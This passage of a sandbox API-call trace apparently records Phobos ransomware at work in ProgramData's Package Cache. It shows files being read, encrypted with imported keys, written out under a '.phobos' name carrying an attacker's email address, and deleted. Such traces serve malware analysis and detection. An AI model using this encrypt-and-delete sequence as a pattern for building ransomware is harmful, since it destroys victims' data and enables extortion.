hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d68) returned 1 [0183.121] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.121] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2fe, lpOverlapped=0x0) returned 1 [0183.217] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x300, dwBufLen=0x300 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x300) returned 1 [0183.217] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x300, lpOverlapped=0x0) returned 1 [0183.218] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0183.219] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.219] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0183.219] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0183.219] WriteFile (in: hFile=0x15c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0183.219] CryptDestroyKey (hKey=0xa32d68) returned 1 [0183.219] CloseHandle (hObject=0x178) returned 1 [0183.219] CloseHandle (hObject=0x15c) returned 1 [0183.219] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\state.rsm")) returned 1 [0183.220] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0183.220] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0183.221] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=781880) returned 1 [0183.221] CloseHandle (hObject=0x15c) returned 1 [0183.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe")) returned 0x20 [0183.221] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.221] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x15c [0183.221] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.221] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.221] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.222] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32d68) returned 1 [0183.222] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.222] ReadFile (in: hFile=0x15c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbee38, lpOverlapped=0x0) returned 1 [0183.417] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbee40, dwBufLen=0xbee40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbee40) returned 1 [0183.425] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbee40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbee40, lpOverlapped=0x0) returned 1 [0183.438] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ce8) returned 1 [0183.438] CryptSetKeyParam (hKey=0xa32ce8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.438] CryptEncrypt (in: hKey=0xa32ce8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0183.438] CryptDestroyKey (hKey=0xa32ce8) returned 1 [0183.438] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0183.438] CryptDestroyKey (hKey=0xa32d68) returned 1 [0183.438] CloseHandle (hObject=0x15c) returned 1 [0183.438] CloseHandle (hObject=0x178) returned 1 [0183.439] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\VC_redist.x64.exe" (normalized: "c:\\programdata\\package cache\\{e52a6842-b0ac-476e-b48f-378a97a67346}\\vc_redist.x64.exe")) returned 1 [0183.446] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0183.446] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.447] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=666) returned 1 [0183.447] CloseHandle (hObject=0x178) returned 1 [0183.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm")) returned 0x20 [0183.447] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.447] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.447] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.447] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.447] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0183.549] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0183.549] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.549] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x29a, lpOverlapped=0x0) returned 1 [0183.550] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a0, dwBufLen=0x2a0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x2a0) returned 1 [0183.550] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x2a0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x2a0, lpOverlapped=0x0) returned 1 [0183.551] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32d68) returned 1 [0183.551] CryptSetKeyParam (hKey=0xa32d68, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.551] CryptEncrypt (in: hKey=0xa32d68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0183.551] CryptDestroyKey (hKey=0xa32d68) returned 1 [0183.551] WriteFile (in: hFile=0x194, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0183.551] CryptDestroyKey (hKey=0xa32de8) returned 1 [0183.551] CloseHandle (hObject=0x178) returned 1 [0183.551] CloseHandle (hObject=0x194) returned 1 [0183.551] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\state.rsm")) returned 1 [0183.553] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0183.553] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0183.553] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=462976) returned 1 [0183.554] CloseHandle (hObject=0x194) returned 1 [0183.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe")) returned 0x20 [0183.554] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0183.554] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.554] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.554] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.555] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32de8) returned 1 [0183.555] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.555] ReadFile (in: hFile=0x194, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x71080, lpOverlapped=0x0) returned 1 [0183.703] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x71090, dwBufLen=0x71090 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x71090) returned 1 [0183.707] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x71090, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x71090, lpOverlapped=0x0) returned 1 [0183.715] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32c28) returned 1 [0183.715] CryptSetKeyParam (hKey=0xa32c28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.715] CryptEncrypt (in: hKey=0xa32c28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0183.715] CryptDestroyKey (hKey=0xa32c28) returned 1 [0183.715] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0183.715] CryptDestroyKey (hKey=0xa32de8) returned 1 [0183.715] CloseHandle (hObject=0x194) returned 1 [0183.715] CloseHandle (hObject=0x178) returned 1 [0183.716] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe" (normalized: "c:\\programdata\\package cache\\{e6e75766-da0f-4ba2-9788-6ea593ce702d}\\vcredist_x86.exe")) returned 1 [0183.720] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0183.720] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.720] GetFileSizeEx (in: hFile=0x178, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=766) returned 1 [0183.721] CloseHandle (hObject=0x178) returned 1 [0183.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm")) returned 0x20 [0183.721] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.721] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.721] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.721] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.721] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0183.830] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0183.830] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.830] ReadFile (in: hFile=0x178, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x2fe, lpOverlapped=0x0) returned 1 [0183.832] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x300, dwBufLen=0x300 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x300) returned 1 [0183.832] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x300, lpOverlapped=0x0) returned 1 [0183.833] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32ca8) returned 1 [0183.833] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.833] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40, dwBufLen=0x40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x40) returned 1 [0183.833] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0183.833] WriteFile (in: hFile=0x17c, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xf2, lpOverlapped=0x0) returned 1 [0183.833] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0183.833] CloseHandle (hObject=0x178) returned 1 [0183.833] CloseHandle (hObject=0x17c) returned 1 [0183.833] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\state.rsm")) returned 1 [0183.834] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0183.834] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0183.836] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=781872) returned 1 [0183.836] CloseHandle (hObject=0x17c) returned 1 [0183.836] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe")) returned 0x80 [0183.837] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0183.837] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0183.837] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.837] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0183.837] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Package Cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\VC_redist.x86.exe.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\package cache\\{f325f05b-f963-4640-a43b-c8a494cdda0f}\\vc_redist.x86.exe.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x178 [0183.837] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32ae8) returned 1 [0183.837] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0183.837] ReadFile (in: hFile=0x17c, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xbee30, lpOverlapped=0x0) returned 1 [0184.065] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbee40, dwBufLen=0xbee40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xbee40) returned 1 [0184.073] WriteFile (in: hFile=0x178, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xbee40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xbee40, lpOverlapped=0x0) returned 1 [0184.085] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: 